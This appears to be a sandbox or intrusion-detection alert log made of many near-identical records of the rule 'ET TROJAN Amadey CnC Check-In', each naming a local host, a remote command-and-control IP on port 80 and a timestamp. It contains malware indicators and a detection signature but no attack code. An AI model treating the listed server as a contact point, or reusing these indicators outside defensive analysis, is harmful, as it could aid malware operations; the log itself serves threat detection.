Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450348802027700 02/07/23-20:03:46.349889
SID:	2027700
Source Port:	50348
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449830802027700 02/07/23-20:01:19.753947
SID:	2027700
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450218802027700 02/07/23-20:03:11.936212
SID:	2027700
Source Port:	50218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449954802027700 02/07/23-20:01:56.265159
SID:	2027700
Source Port:	49954
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450135802027700 02/07/23-20:02:51.914333
SID:	2027700
Source Port:	50135
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450389802027700 02/07/23-20:03:56.428558
SID:	2027700
Source Port:	50389
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450057802027700 02/07/23-20:02:25.359863
SID:	2027700
Source Port:	50057
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449729802027700 02/07/23-20:00:53.543429
SID:	2027700
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450213802027700 02/07/23-20:03:10.733288
SID:	2027700
Source Port:	50213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450029802027700 02/07/23-20:02:18.139693
SID:	2027700
Source Port:	50029
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450467802027700 02/07/23-20:04:15.494809
SID:	2027700
Source Port:	50467
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450176802027700 02/07/23-20:03:01.908838
SID:	2027700
Source Port:	50176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450093802027700 02/07/23-20:02:38.122439
SID:	2027700
Source Port:	50093
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449926802027700 02/07/23-20:01:49.382340
SID:	2027700
Source Port:	49926
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449802802027700 02/07/23-20:01:13.174021
SID:	2027700
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450130802027700 02/07/23-20:02:48.878883
SID:	2027700
Source Port:	50130
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450384802027700 02/07/23-20:03:55.223735
SID:	2027700
Source Port:	50384
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449765802027700 02/07/23-20:01:02.096121
SID:	2027700
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450426802027700 02/07/23-20:04:05.502601
SID:	2027700
Source Port:	50426
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449807802027700 02/07/23-20:01:14.403500
SID:	2027700
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450000802027700 02/07/23-20:02:10.893167
SID:	2027700
Source Port:	50000
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450254802027700 02/07/23-20:03:20.750307
SID:	2027700
Source Port:	50254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449848802027700 02/07/23-20:01:24.096025
SID:	2027700
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449889802027700 02/07/23-20:01:36.602318
SID:	2027700
Source Port:	49889
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450278802027700 02/07/23-20:03:29.144513
SID:	2027700
Source Port:	50278
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450024802027700 02/07/23-20:02:16.923135
SID:	2027700
Source Port:	50024
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449990802027700 02/07/23-20:02:05.389458
SID:	2027700
Source Port:	49990
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450085802027700 02/07/23-20:02:35.926262
SID:	2027700
Source Port:	50085
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450183802027700 02/07/23-20:03:03.375286
SID:	2027700
Source Port:	50183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450281802027700 02/07/23-20:03:29.880685
SID:	2027700
Source Port:	50281
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450094802027700 02/07/23-20:02:38.377724
SID:	2027700
Source Port:	50094
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450447802027700 02/07/23-20:04:10.628545
SID:	2027700
Source Port:	50447
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450192802027700 02/07/23-20:03:05.567549
SID:	2027700
Source Port:	50192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450349802027700 02/07/23-20:03:46.609528
SID:	2027700
Source Port:	50349
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450419802027700 02/07/23-20:04:03.800341
SID:	2027700
Source Port:	50419
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450422802027700 02/07/23-20:04:04.527765
SID:	2027700
Source Port:	50422
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449803802027700 02/07/23-20:01:13.424990
SID:	2027700
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449901802027700 02/07/23-20:01:39.612533
SID:	2027700
Source Port:	49901
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450324802027700 02/07/23-20:03:40.470050
SID:	2027700
Source Port:	50324
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450189802027700 02/07/23-20:03:04.831775
SID:	2027700
Source Port:	50189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450413802027700 02/07/23-20:04:02.323273
SID:	2027700
Source Port:	50413
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449959802027700 02/07/23-20:01:57.490225
SID:	2027700
Source Port:	49959
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449793802027700 02/07/23-20:01:11.030637
SID:	2027700
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450221802027700 02/07/23-20:03:12.688306
SID:	2027700
Source Port:	50221
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449732802027700 02/07/23-20:00:54.261632
SID:	2027700
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449986802027700 02/07/23-20:02:03.914624
SID:	2027700
Source Port:	49986
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450351802027700 02/07/23-20:03:47.097069
SID:	2027700
Source Port:	50351
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450155802027700 02/07/23-20:02:56.813184
SID:	2027700
Source Port:	50155
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450380802027700 02/07/23-20:03:54.222459
SID:	2027700
Source Port:	50380
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449897802027700 02/07/23-20:01:38.564289
SID:	2027700
Source Port:	49897
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449856802027700 02/07/23-20:01:28.475142
SID:	2027700
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450114802027700 02/07/23-20:02:43.402147
SID:	2027700
Source Port:	50114
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450310802027700 02/07/23-20:03:37.027404
SID:	2027700
Source Port:	50310
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450368802027700 02/07/23-20:03:51.253026
SID:	2027700
Source Port:	50368
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450025802027700 02/07/23-20:02:17.165507
SID:	2027700
Source Port:	50025
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450066802027700 02/07/23-20:02:30.943302
SID:	2027700
Source Port:	50066
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450262802027700 02/07/23-20:03:23.849061
SID:	2027700
Source Port:	50262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450279802027700 02/07/23-20:03:29.390956
SID:	2027700
Source Port:	50279
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450475802027700 02/07/23-20:04:17.464492
SID:	2027700
Source Port:	50475
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449917802027700 02/07/23-20:01:43.562458
SID:	2027700
Source Port:	49917
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449822802027700 02/07/23-20:01:17.781118
SID:	2027700
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449958802027700 02/07/23-20:01:57.237616
SID:	2027700
Source Port:	49958
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450209802027700 02/07/23-20:03:09.736543
SID:	2027700
Source Port:	50209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449828802027700 02/07/23-20:01:19.281463
SID:	2027700
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449733802027700 02/07/23-20:00:54.497423
SID:	2027700
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449863802027700 02/07/23-20:01:30.373662
SID:	2027700
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450352802027700 02/07/23-20:03:47.357138
SID:	2027700
Source Port:	50352
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449774802027700 02/07/23-20:01:04.281618
SID:	2027700
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449987802027700 02/07/23-20:02:04.169864
SID:	2027700
Source Port:	49987
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450441802027700 02/07/23-20:04:09.174122
SID:	2027700
Source Port:	50441
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449875802027700 02/07/23-20:01:33.341460
SID:	2027700
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450142802027700 02/07/23-20:02:53.636957
SID:	2027700
Source Port:	50142
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449872802027700 02/07/23-20:01:32.599241
SID:	2027700
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449777802027700 02/07/23-20:01:04.763085
SID:	2027700
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450240802027700 02/07/23-20:03:17.295970
SID:	2027700
Source Port:	50240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450396802027700 02/07/23-20:03:58.143968
SID:	2027700
Source Port:	50396
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449780802027700 02/07/23-20:01:05.481040
SID:	2027700
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450139802027700 02/07/23-20:02:52.924797
SID:	2027700
Source Port:	50139
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449869802027700 02/07/23-20:01:31.842864
SID:	2027700
Source Port:	49869
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449786802027700 02/07/23-20:01:08.155419
SID:	2027700
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450323802027700 02/07/23-20:03:40.235917
SID:	2027700
Source Port:	50323
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450151802027700 02/07/23-20:02:55.858238
SID:	2027700
Source Port:	50151
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450225802027700 02/07/23-20:03:13.640810
SID:	2027700
Source Port:	50225
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450479802027700 02/07/23-20:04:18.422959
SID:	2027700
Source Port:	50479
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450053802027700 02/07/23-20:02:24.008849
SID:	2027700
Source Port:	50053
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450136802027700 02/07/23-20:02:52.154928
SID:	2027700
Source Port:	50136
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450234802027700 02/07/23-20:03:15.828144
SID:	2027700
Source Port:	50234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450081802027700 02/07/23-20:02:34.618171
SID:	2027700
Source Port:	50081
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449933802027700 02/07/23-20:01:51.094138
SID:	2027700
Source Port:	49933
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449749802027700 02/07/23-20:00:58.376848
SID:	2027700
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449942802027700 02/07/23-20:01:53.287894
SID:	2027700
Source Port:	49942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450463802027700 02/07/23-20:04:14.491803
SID:	2027700
Source Port:	50463
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449847802027700 02/07/23-20:01:23.854308
SID:	2027700
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449844802027700 02/07/23-20:01:23.138925
SID:	2027700
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449761802027700 02/07/23-20:01:01.073822
SID:	2027700
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450253802027700 02/07/23-20:03:20.519825
SID:	2027700
Source Port:	50253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449891802027700 02/07/23-20:01:37.097124
SID:	2027700
Source Port:	49891
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449850802027700 02/07/23-20:01:24.592099
SID:	2027700
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449888802027700 02/07/23-20:01:36.353710
SID:	2027700
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450069802027700 02/07/23-20:02:31.730232
SID:	2027700
Source Port:	50069
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449799802027700 02/07/23-20:01:12.467161
SID:	2027700
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449758802027700 02/07/23-20:01:00.586842
SID:	2027700
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450040802027700 02/07/23-20:02:20.818780
SID:	2027700
Source Port:	50040
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450170802027700 02/07/23-20:03:00.433375
SID:	2027700
Source Port:	50170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450294802027700 02/07/23-20:03:33.100245
SID:	2027700
Source Port:	50294
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

